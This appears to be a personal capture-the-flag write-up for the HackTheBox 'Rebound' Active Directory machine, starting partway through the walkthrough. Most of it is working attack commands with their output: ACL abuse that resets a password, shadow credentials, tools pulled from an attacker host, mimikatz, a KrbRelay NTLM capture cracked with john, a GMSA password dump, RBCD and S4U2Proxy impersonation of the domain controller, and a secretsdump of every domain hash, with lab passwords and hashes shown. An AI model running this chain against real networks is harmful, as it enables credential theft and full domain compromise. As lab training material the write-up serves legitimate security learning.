The object ServiceMgmt has FullControl permissions on the Service Users. This grants complete control over the OU and its objects, allowing for significant modifications and potential privilege escalation.

Still no idea what group does, but we'll probably need to get there first.

PV > Get-DomainObjectAcl -SecurityIdentifier S-1-5-21-4078382237-1492182817-2568127209
[2024-12-01 18:32:03] [Get-DomainObjectAcl] Recursing all domain objects. This might take a while

Add oorend to servicemgmt group

(LDAPS)-[dc01.rebound.htb]-[rebound\oorend]
PV > Add-DomainGroupMember -Identity servicemgmt -Members oorend
[2024-12-01 18:49:47] User oorend successfully added to servicemgmt
PV > Get-DomainGroupMember -Identity SERVICEMGMT -Select MemberName
ppaul
fflock
oorend

Command was failing because insufficient permissions, when we are already in the group?...

Add-DomainObjectAcl -TargetIdentity "OU=Service Users,DC=rebound,DC=htb" -PrincipalIdentity "oorend" -Rights "FullControl"

GenericAll abuse

└─$ bloodyAD -u oorend -p '1GR8t@$$4u' -d rebound.htb --host 10.129.229.114 add groupMember ServiceMgmt oorend
[+] oorend added to ServiceMgmt

└─$ bloodyAD -u oorend -p '1GR8t@$$4u' -d rebound.htb --host 10.129.229.114 add genericAll 'OU=SERVICE USERS,DC=REBOUND,DC=HTB' oorend
[+] oorend has now GenericAll on OU=SERVICE USERS,DC=REBOUND,DC=HTB

└─$ bloodyAD -u oorend -p '1GR8t@$$4u' -d rebound.htb --host 10.129.229.114 set password winrm_svc Password123$
[+] Password changed successfully!
--- # Cronjob resetting password..
bloodyAD -u oorend -p '1GR8t@$$4u' -d rebound.htb --host 10.129.229.114 add groupMember ServiceMgmt oorend
bloodyAD -u oorend -p '1GR8t@$$4u' -d rebound.htb --host 10.129.229.114 add genericAll 'OU=SERVICE USERS,DC=REBOUND,DC=HTB' oorend
bloodyAD -u oorend -p '1GR8t@$$4u' -d rebound.htb --host 10.129.229.114 set password winrm_svc Password123$

Alternative would have been to use Shadow Credentials attack with Certipy, but because of PKINIT not enabled it's failing (I think(?))

└─$ bloodyAD -u oorend -p '1GR8t@$$4u' -d rebound.htb --host 10.129.229.114 add groupMember ServiceMgmt oorend
└─$ bloodyAD -u oorend -p '1GR8t@$$4u' -d rebound.htb --host 10.129.229.114 add genericAll 'OU=SERVICE USERS,DC=REBOUND,DC=HTB' oorend
└─$ faketime -f +7h certipy-ad shadow auto -u oorend@rebound.htb -p '1GR8t@$$4u' -k -account winrm_svc -target dc01.rebound.htb -dc-ip 10.129.229.114 -dns-tcp -timeout 99 -ns 10.129.229.114
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Targeting user 'winrm_svc'
[*] Generating certificate
[*] Certificate generated
[*] Generating Key Credential
[*] Key Credential generated with DeviceID '24ad6f85-6f2b-2d7a-b532-1aafab717dea'
[*] Adding Key Credential with device ID '24ad6f85-6f2b-2d7a-b532-1aafab717dea' to the Key Credentials for 'winrm_svc'
[*] Successfully added Key Credential with device ID '24ad6f85-6f2b-2d7a-b532-1aafab717dea' to the Key Credentials for 'winrm_svc'
[*] Authenticating as 'winrm_svc' with the certificate
[*] Using principal: winrm_svc@rebound.htb
[*] Trying to get TGT...
[-] Got error while trying to request TGT: Kerberos SessionError: KDC_ERR_PADATA_TYPE_NOSUPP(KDC has no support for padata type)
[*] Restoring the old Key Credentials for 'winrm_svc'
[*] Successfully restored the old Key Credentials for 'winrm_svc'
[*] NT hash for 'winrm_svc': None

It's also possible to do shadow credentials attack with bloodyAD

└─$ bloodyAD -u oorend -p '1GR8t@$$4u' -d rebound.htb --host 10.129.229.114 add shadowCredentials winrm_svc

User.txt

└─$ evil-winrm -i 10.129.229.114 -u winrm_svc -p Password123$
*Evil-WinRM* PS C:\Users\winrm_svc> ls $ENV:USERPROFILE -fil *.txt -rec | %{$_.FullName;cat $_.FullName}
C:\Users\winrm_svc\Desktop\user.txt
4fa95b20c867f31483a4dc3367420924

Privilege Escalation

Update bloodhound data with winrm_svc

└─$ faketime -f +7h bloodhound-python -u 'winrm_svc' -p 'Password123$' -d rebound.htb -k -ns 10.129.229.114 --dns-tcp --dns-timeout 100 -op winrm_svc --zip -c Group,LocalADmin,RDP,DCOM,Container,PSRemote,Session,Acl,Trusts,LoggedOn

*Evil-WinRM* PS C:\Users\winrm_svc\Music> iwr 10.10.14.99/wp.exe -out wp.exe
*Evil-WinRM* PS C:\Users\winrm_svc\Music> .\wp.exe | tee -filepath wp.log
...
*Evil-WinRM* PS C:\Users\winrm_svc\Music> get-process

Handles  NPM(K)    PM(K)      WS(K)     CPU(s)     Id  SI ProcessName
-------  ------    -----      -----     ------     --  -- -----------
    395      32    12548      21156              2844   0 certsrv
    474      19     2396       5580               388   0 csrss
    269      16     1992       5156               496   1 csrss
    357      15     3440      14912              6080   1 ctfmon
    399      33    16288      24868              3036   0 dfsrs
    181      11     2284       7844              2364   0 dfssvc
    289      14     3856      13712              3928   0 dllhost
   5375    4792    69148      71060              2892   0 dns
    602      25    18320      42684              1000   1 dwm
   1503      59    25444      86536              5596   1 explorer
     53       6     1780       5420              2824   1 fontdrvhost
     53       6     1496       4708              2828   0 fontdrvhost

Linpeas didn't find other logged in users, but SI (Session ID) has 2 values: 0 and 1; meaning there's another user logged on.

Sharphound provided more data then python version:

*Evil-WinRM* PS C:\Users\winrm_svc\Music> curl 10.10.14.99/sh.exe -outfile sh.exe
*Evil-WinRM* PS C:\Users\winrm_svc\Music> .\sh.exe -c all --zipfilename winrm_svc_local.zip
*Evil-WinRM* PS C:\Users\winrm_svc\Music> download 20241201165126_winrm_svc_local.zip

Writeup-2.png

Bloodhound is also showing it now.

Writeup-3.png

Note: This might have been skill issue again, I was in Pathfinding with DC01 -> WINRM_SVC and that's probably why I didn't see this connection...

tbrady user has a ReadGMSAPassword, if we can get that user tho.

Writeup-4.png

Usually if normal commands that are not working that should be working it's because it's not allowed to run remote, RunasCs can be used to bypass this restriction.

*Evil-WinRM* PS C:\Users\winrm_svc\Documents> tasklist
tasklist.exe : ERROR: Access denied
    + CategoryInfo          : NotSpecified: (ERROR: Access denied:String) [], RemoteException
    + FullyQualifiedErrorId : NativeCommandError

https://book.hacktricks.xyz/windows-hardening/stealing-credentials/credentials-mimikatz#credential-dumping mimikatz attack fails

*Evil-WinRM* PS C:\Users\winrm_svc\Music> iwr 10.10.14.99/mimikatz.exe -outfile mimi.exe
*Evil-WinRM* PS C:\Users\winrm_svc\Music> .\mimi.exe "privilege::debug" "sekurlsa::logonpasswords" exit
mimikatz(commandline) # privilege::debug
ERROR kuhl_m_privilege_simple ; RtlAdjustPrivilege (20) c0000061

mimikatz(commandline) # sekurlsa::logonpasswords
ERROR kuhl_m_sekurlsa_acquireLSA ; Handle on memory (0x00000005)

mimikatz(commandline) # exit
Bye!

Stealing credentials

krbrelayx can't be used here as connection happens on DC itself and python doesn't exist on DC. KrbRelay is C# tool so it's going to work for us.

*Evil-WinRM* PS C:\Users\winrm_svc\Music> curl 10.10.14.99/KrbRelay.exe -out kr.exe
*Evil-WinRM* PS C:\Users\winrm_svc\Music> .\kr.exe -session 1 -clsid 0ea79562-d4f6-47ba-b7f2-1e9b06ba16a4 -ntlm
[-] Session 1 does not exists
*Evil-WinRM* PS C:\Users\winrm_svc\Music> curl 10.10.14.99/RunasCs.exe -out rc.exe
*Evil-WinRM* PS C:\Users\winrm_svc\Music> .\rc.exe uwu uwu -l 9 "C:\Users\winrm_svc\Music\kr.exe -session 1 -clsid 0ea79562-d4f6-47ba-b7f2-1e9b06ba16a4 -ntlm"

[*] Auth Context: rebound\tbrady
[*] Rewriting function table
[*] Rewriting PEB
[*] GetModuleFileName: System
[*] Init com server
[*] GetModuleFileName: C:\Users\winrm_svc\Music\kr.exe
[*] Register com server
objref:TUVPVwEAAAAAAAAAAAAAAMAAAAAAAABGgQIAAAAAAAAVsUCr04tcydvgMs0OOy2gAjgAAFwU//+RK118th5j0yIADAAHADEAMgA3AC4AMAAuADAALgAxAAAAAAAJAP//AAAeAP//AAAQAP//AAAKAP//AAAWAP//AAAfAP//AAAOAP//AAAAAA==:

[*] Forcing cross-session authentication
[*] Using CLSID: 0ea79562-d4f6-47ba-b7f2-1e9b06ba16a4
[*] Spawning in session 1
[*] NTLM1
4e544c4d535350000100000097b218e2070007002c00000004000400280000000a0063450000000f444330315245424f554e44
[*] NTLM2
4e544c4d53535000020000000e000e003800000015c299e24e2e40c1e1bd1ec6000000000000000086008600460000000a0063450000000f7200650062006f0075006e00640002000e007200650062006f0075006e006400010008004400430030003100040016007200650062006f0075006e0064002e006800740062000300200064006300300031002e007200650062006f0075006e0064002e00680074006200050016007200650062006f0075006e0064002e0068007400620007000800702fb5405a44db01000000000000000000000000ccccccccf00000000000000000000200011008000bcccccc
[*] AcceptSecurityContext: SEC_I_CONTINUE_NEEDED
[*] fContextReq: Delegate, MutualAuth, ReplayDetect, SequenceDetect, UseDceStyle, Connection, AllowNonUserLogons
[*] NTLM3
tbrady::rebound:4e2e40c1e1bd1ec6:e8154c8f3d480022ef5ee7f05dc4ff68:0101000000000000702fb5405a44db01d0673f6303990f8f0000000002000e007200650062006f0075006e006400010008004400430030003100040016007200650062006f0075006e0064002e006800740062000300200064006300300031002e007200650062006f0075006e0064002e00680074006200050016007200650062006f0075006e0064002e0068007400620007000800702fb5405a44db010600040006000000080030003000000000000000010000000020000022fd9fca22a545b94dc14a4bbbace7f47bb7d8671975bf45c0fc3c4a2ebba45c0a00100000000000000000000000000000000000090000000000000000000000
System.UnauthorizedAccessException: Access is denied. (Exception from HRESULT: 0x80070005 (E_ACCESSDENIED))
   at KrbRelay.IStandardActivator.StandardGetInstanceFromIStorage(COSERVERINFO pServerInfo, Guid& pclsidOverride, IntPtr punkOuter, CLSCTX dwClsCtx, IStorage pstg, Int32 dwCount, MULTI_QI[] pResults)
   at KrbRelay.Program.Main(String[] args)

-l 9 means to Run a command simulating the /netonly flag of runas.exe source

I think we don't need to provide real credentials and uwu word is just filler for RunasCs to work properly, it's going to spawn process locally and that's cool with us.

Crack the password

➜ .\john-1.9.0-jumbo-1-win64\run\john.exe --wordlist=.\rockyou.txt .\hashes
Warning: detected hash type "netntlmv2", but the string is also recognized as "ntlmv2-opencl"
Use the "--format=ntlmv2-opencl" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
543BOMBOMBUNmanda (tbrady)
1g 0:00:00:05 DONE (2024-12-01 22:36) 0.1697g/s 2068Kp/s 2068Kc/s 2068KC/s 5462607..543584
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed

Creds: tbrady:543BOMBOMBUNmanda

GMSA (tbrady)

https://www.netexec.wiki/ldap-protocol/dump-gmsa

└─$ faketime -f +7h netexec ldap 10.129.229.114 -u tbrady -p '543BOMBOMBUNmanda' --gmsa -k
SMB         10.129.229.114  445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:rebound.htb) (signing:True) (SMBv1:False)
LDAPS       10.129.229.114  636    DC01             [+] rebound.htb\tbrady:543BOMBOMBUNmanda
LDAPS       10.129.229.114  636    DC01             [*] Getting GMSA Passwords
LDAPS       10.129.229.114  636    DC01             Account: delegator$           NTLM: 4ba33add1108fe560429fc27a1bcab6b

Creds: delegator$:4ba33add1108fe560429fc27a1bcab6b

Privilege Escalation (2)

Delegations

https://www.thehacker.recipes/ad/movement/kerberos/delegations/: Kerberos delegations allow services to access other services on behalf of domain users.

└─$ faketime -f +7h impacket-findDelegation 'REBOUND.HTB'/'tbrady':'543BOMBOMBUNmanda' -k
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] Getting machine hostname
[-] CCache file is not found. Skipping...
[-] CCache file is not found. Skipping...
AccountName  AccountType                          DelegationType  DelegationRightsTo     SPN Exists
-----------  -----------------------------------  --------------  ---------------------  ----------
delegator$   ms-DS-Group-Managed-Service-Account  Constrained     http/dc01.rebound.htb  No

https://www.thehacker.recipes/ad/movement/kerberos/delegations/constrained: If a service account, configured with constrained delegation to another service, is compromised, an attacker can impersonate any user (e.g. domain admin, except users protected against delegation) in the environment to access another service the initial one can delegate to.

The administrator has NOT_DELEGATED, so it's a protected account against this type of attacks.

└─$ bloodyAD -u oorend -p '1GR8t@$$4u' -d rebound.htb --host 10.129.229.114 get object administrator | grep DELEG
userAccountControl: NORMAL_ACCOUNT; DONT_EXPIRE_PASSWORD; NOT_DELEGATED

Hmmm... ChatGPT:

https://www.thehacker.recipes/ad/movement/kerberos/delegations/rbcd: If an account, having the capability to edit the msDS-AllowedToActOnBehalfOfOtherIdentity attribute of another object (e.g. the GenericWrite ACE, see Abusing ACLs), is compromised, an attacker can use it populate that attribute, hence configuring that object for RBCD.

Service account doesn't have mentioned attribute, but I think the attack will still be valid

└─$ bloodyAD -u oorend -p '1GR8t@$$4u' -d rebound.htb --host 10.129.229.114 get object delegator$ | grep msDS
msDS-AllowedToDelegateTo: http/dc01.rebound.htb
msDS-GroupMSAMembership: O:S-1-5-32-544D:(A;;0xf01ff;;;S-1-5-21-4078382237-1492182817-2568127209-7686)
msDS-ManagedPasswordId: AQAAAEtEU0sCAAAAagEAABwAAAAGAAAAqozXLXGPzBuv4FrBregFhwAAAAAYAAAAGAAAAHIAZQBiAG8AdQBuAGQALgBoAHQAYgAAAHIAZQBiAG8AdQBuAGQALgBoAHQAYgAAAA==
msDS-ManagedPasswordInterval: 30
msDS-ManagedPasswordPreviousId: AQAAAEtEU0sCAAAAagEAABkAAAAeAAAAqozXLXGPzBuv4FrBregFhwAAAAAYAAAAGAAAAHIAZQBiAG8AdQBuAGQALgBoAHQAYgAAAHIAZQBiAG8AdQBuAGQALgBoAHQAYgAAAA==
msDS-SupportedEncryptionTypes: 28
objectClass: top; person; organizationalPerson; user; computer; msDS-GroupManagedServiceAccount

To make this work we need user with SPN, so can use ldap_monitor.

└─$ faketime -f +7h impacket-rbcd 'rebound.htb/delegator$' -hashes :4ba33add1108fe560429fc27a1bcab6b -k -delegate-from ldap_monitor -delegate-to 'delegator$' -action write -dc-ip dc01.rebound.htb -use-ldaps -debug
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[+] Impacket Library Installation Path: /usr/lib/python3/dist-packages/impacket
[-] CCache file is not found. Skipping...
[+] The specified path is not correct or the KRB5CCNAME environment variable is not defined
[+] Trying to connect to KDC at dc01.rebound.htb:88
[+] Trying to connect to KDC at dc01.rebound.htb:88
[+] Trying to connect to KDC at dc01.rebound.htb:88
[+] Initializing domainDumper()
[*] Attribute msDS-AllowedToActOnBehalfOfOtherIdentity is empty
[*] Delegation rights modified successfully!
[*] ldap_monitor can now impersonate users on delegator$ via S4U2Proxy
[*] Accounts allowed to act on behalf of other identity:
[*]     ldap_monitor   (S-1-5-21-4078382237-1492182817-2568127209-7681)

Note: If you are getting invalid server address make sure you have dc01 in /etc/hosts or in DNS... (Windows things I guess...)

Verify that it was added:

└─$ faketime -f +7h impacket-findDelegation 'REBOUND.HTB'/'tbrady':'543BOMBOMBUNmanda' -k
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

AccountName   AccountType                          DelegationType              DelegationRightsTo     SPN Exists
------------  -----------------------------------  --------------------------  ---------------------  ----------
ldap_monitor  Person                               Resource-Based Constrained  delegator$             No
delegator$    ms-DS-Group-Managed-Service-Account  Constrained                 http/dc01.rebound.htb  No

This delegation can act as behalf on users, but not administrator. We can try to impersonate the DC service account itself.

└─$ faketime -f +7h impacket-getST -spn 'browser/dc01.rebound.htb' -impersonate DC01$ -dc-ip 'dc01.rebound.htb' 'REBOUND.HTB/ldap_monitor:1GR8t@$$4u'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating DC01$
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in DC01$@browser_dc01.rebound.htb@REBOUND.HTB.ccache

The ticket is forwardable and essentially acts like a Silver Ticket.

└─$ impacket-describeTicket './DC01$@browser_dc01.rebound.htb@REBOUND.HTB.ccache'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] Number of credentials in cache: 1
[*] Parsing credential[0]:
[*] Ticket Session Key            : 5be8a304b057bef209cb2b7c8b2f0f6f
[*] User Name                     : DC01$
[*] User Realm                    : REBOUND.HTB
[*] Service Name                  : browser/dc01.rebound.htb
[*] Service Realm                 : REBOUND.HTB
[*] Start Time                    : 01/12/2024 21:56:13 PM
[*] End Time                      : 02/12/2024 07:56:12 AM
[*] RenewTill                     : 02/12/2024 21:56:14 PM
[*] Flags                         : (0x40a10000) forwardable, renewable, pre_authent, enc_pa_rep
[*] KeyType                       : rc4_hmac
[*] Base64(key)                   : W+ijBLBXvvIJyyt8iy8Pbw==
[*] Kerberoast hash               : $krb5tgs$18$USER$REBOUND.HTB$*browser/dc01.rebound.htb*$c740b6...03d27944393e89d2ce62c
[*] Decoding unencrypted data in credential[0]['ticket']:
[*]   Service Name                : browser/dc01.rebound.htb
[*]   Service Realm               : REBOUND.HTB
[*]   Encryption type             : aes256_cts_hmac_sha1_96 (etype 18)
[-] Could not find the correct encryption key! Ticket is encrypted with aes256_cts_hmac_sha1_96 (etype 18), but no keys/creds were supplied

└─$ KRB5CCNAME='DC01$@browser_dc01.rebound.htb@REBOUND.HTB.ccache' klist
Ticket cache: FILE:DC01$@browser_dc01.rebound.htb@REBOUND.HTB.ccache
Default principal: DC01$@REBOUND.HTB

Valid starting       Expires              Service principal
12/01/2024 21:56:13  12/02/2024 07:56:12  browser/dc01.rebound.htb@REBOUND.HTB
        renew until 12/02/2024 21:56:14

There's second step to using this ticket: https://www.thehacker.recipes/ad/movement/kerberos/delegations/constrained#_2-additional-s4u2proxy

└─$ faketime -f +7h impacket-getST -spn "http/dc01.rebound.htb" -impersonate "DC01$" -additional-ticket './DC01$@browser_dc01.rebound.htb@REBOUND.HTB.ccache' -hashes :4ba33add1108fe560429fc27a1bcab6b 'rebound.htb/delegator$'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating DC01$
[*]     Using additional ticket ./DC01$@browser_dc01.rebound.htb@REBOUND.HTB.ccache instead of S4U2Self
[*] Requesting S4U2Proxy
[*] Saving ticket in DC01$@http_dc01.rebound.htb@REBOUND.HTB.ccache

└─$ KRB5CCNAME='DC01$@http_dc01.rebound.htb@REBOUND.HTB.ccache' klist
Ticket cache: FILE:DC01$@http_dc01.rebound.htb@REBOUND.HTB.ccache
Default principal: DC01$@REBOUND.HTB

Valid starting       Expires              Service principal
12/01/2024 22:09:09  12/02/2024 08:09:08  http/dc01.rebound.htb@REBOUND.HTB
        renew until 12/02/2024 22:09:10

└─$ KRB5CCNAME='DC01$@http_dc01.rebound.htb@REBOUND.HTB.ccache' faketime -f +7h impacket-secretsdump -k -no-pass dc01.rebound.htb -just-dc-ntlm
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:176be138594933bb67db3b2572fc91b8:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:1108b27a9ff61ed4139d1443fbcf664b:::
ppaul:1951:aad3b435b51404eeaad3b435b51404ee:7785a4172e31e908159b0904e1153ec0:::
llune:2952:aad3b435b51404eeaad3b435b51404ee:e283977e2cbffafc0d6a6bd2a50ea680:::
fflock:3382:aad3b435b51404eeaad3b435b51404ee:1fc1d0f9c5ada600903200bc308f7981:::
jjones:5277:aad3b435b51404eeaad3b435b51404ee:e1ca2a386be17d4a7f938721ece7fef7:::
mmalone:5569:aad3b435b51404eeaad3b435b51404ee:87becdfa676275415836f7e3871eefa3:::
nnoon:5680:aad3b435b51404eeaad3b435b51404ee:f9a5317b1011878fc527848b6282cd6e:::
ldap_monitor:7681:aad3b435b51404eeaad3b435b51404ee:5af1ff64aac6100ea8fd2223b642d818:::
oorend:7682:aad3b435b51404eeaad3b435b51404ee:5af1ff64aac6100ea8fd2223b642d818:::
winrm_svc:7684:aad3b435b51404eeaad3b435b51404ee:4469650fd892e98933b4536d2e86e512:::
batch_runner:7685:aad3b435b51404eeaad3b435b51404ee:d8a34636c7180c5851c19d3e865814e0:::
tbrady:7686:aad3b435b51404eeaad3b435b51404ee:114e76d0be2f60bd75dc160ab3607215:::
DC01$:1000:aad3b435b51404eeaad3b435b51404ee:989c1783900ffcb85de8d5ca4430c70f:::
delegator$:7687:aad3b435b51404eeaad3b435b51404ee:4ba33add1108fe560429fc27a1bcab6b:::
[*] Cleaning up...

Root.txt

*Evil-WinRM* PS C:\Users\Administrator\Documents> ls $ENV:USERPROFILE -fil *.txt -rec | %{$_.FullName;cat $_.FullName}
C:\Users\Administrator\Desktop\root.txt
1dd53e48094c810a28d9ee966c0bae7a

Help

• Ippsec: HackTheBox - Rebound

• arth0s: HackTheBox Rebound Write-Up — Insane!

• 0xdf: HTB: Rebound